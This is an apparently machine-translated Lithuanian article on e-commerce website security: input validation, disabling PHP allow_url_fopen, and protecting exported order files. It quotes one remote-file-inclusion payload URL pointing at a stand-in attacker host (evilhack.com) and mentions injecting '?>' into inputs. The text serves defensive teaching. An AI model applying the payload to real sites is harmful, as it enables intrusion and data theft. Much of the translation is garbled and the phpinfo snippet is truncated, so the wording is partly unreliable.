E-Commerce Saugumo - atitaisymą Saugumo skylė

Saugumas E-komercijos svetainės turi būti svarbiausias dalykas kuriant elektroninės komercijos svetainėje ar programinės įrangos. Kūrėjas turi žinoti apie visus saugumo aspektus kuriant svetainę. Su e-komercija tampa vis labiau įprastas šių dienų, saugumo atakų skaičius neabejotinai auga. Paranoja yra sveikas dalykas, e-commerce svetainės kūrėjai, mes turime išlaikyti iki vartų saugumo klausimus ir išsaugoti mūsų ausys ir akys atsiveria. Nors šių spragų yra rimtas, taip spragų, jei dabar yra lengvai nustatoma.

Toliau išvardyti kai kurie saugumo sumetimais turi būti įtrauktos kuriant svetainę. Šis straipsnis netaikomas E-Shopping vagystė, skaitykite mano atskiras straipsnis apie tai.

Vartotojo indėlis - kiekvieną įėjimo, ar tai būtų įvesti kiekį, ieško produktų, įvežamų vardas ir tt, turi būti patvirtintos dėl įtartinų ženklų. Jei tai nebus padaryta, tai galima įvesti "?>", uždarymo pabaigoje Tags PHP ir vykdyti PHP kodą.

Jis yra daug saugesnis leisti skaičių ir simbolių Az (sostinėse imtinai) ir 0-9 ir daugiau nieko, o ne padaryti visų savybių, kad ten neturėtų būti, sąrašą. Patvirtinimo scenarijų reikia pereiti per kiekvieno požymio po vieną. Tai turi būti pasiekta naudojant serverio pusės įteisinimo, o ne Javascript. Naudojant serverio pirkimo patvirtinimas svarbu išlaikyti nepageidaujamus simbolius

Egzistuoja dar vieną svarbų vykdydamos PHP kodas. Kai naudojant PHP yra nustatyti vadinamas allow_url_fopen, kuri leidžia atidaryti failus iš PHP skripto. Šis parametras turėtų būti išjungtas, išskyrus neabejotinai būtinus atvejus.

Įsivaizduokite, turite PHP tiek fiksuoto, viršus ir apačia, ir prieiti prie savo interneto puslapius, tai tipo http://www.mysite.com/index.php?page=page2. Viskas, ko reikia yra piktybinis vartotojas gali paleisti scenarijų pakeisti šiuos parametrus pagal rašyti "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" su PHP kodas failo "hacker.txt". Galima nieko atsitikti, PHP failus skaityti, išbraukti, gyvybiškai svarbios informacijos vagystės.

Jei nesate tikri, kad šis parametras yra įjungti arba išjungti, prašom nukopijuokite šį PHP kodą į tekstinį failą ir įkelkite jį į savo interneto serverį:

phpinfo ();
?>

Kai atidarote savo scenarijų į savo serverį, turite susidurti kuriame allow_url_fopen pagal konfigūraciją.

Kompiuterio vartotojo, normaliomis sąlygomis negali rasti šio parametro vertės.

Būkite atsargūs, eksportuojamų duomenų, pavyzdžiui, užsakymų, produktų CSV ir MySQL failus. Jei šie duomenys yra eksportuojami iš scenarijaus ir yra saugomi interneto serveryje, pagal bendro failo vardas ty. http://www.mysite.com/admin/output_tables.csv. Tai tik tikrai problema, kai eksportuojami duomenys, gyvena iš katalogo failas, kuris yra viešai prieinamas. Yra du būdai išvengti šios saugumo spragos - pirmiausia turi išėjimo byla už apsaugota slaptažodžiu katalogas, antra, yra duomenų, esančių viduje HTML textarea formos elementą scenarijus. Storeowner galima tada nukopijuokite šį textfile informaciją ir sukurti naują failą į savo kompiuterį ir įdėkite informacijos rasite čia.

Užtenka hacker rasti šio Filename tikrinant iš e-komercijos programinės įrangos demo svetainę ir ieškoti to paties pavadinimo dėl nekilnojamojo svetainę.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Play Video Kaip apsaugoti kompiuterį Secure	Play Video Kaip patikrinti saugos parametrus "Windows Vista"

Žemiau yra daugiau straipsnių, susijusių su pirmiau minėtame straipsnyje iš "Elektroninė prekyba" kategoriją.

Žmonės domisi minėtą straipsnį "E-komercija Saugumo - atitaisymą saugumo skylė" taip pat domisi Related articles išvardyti toliau: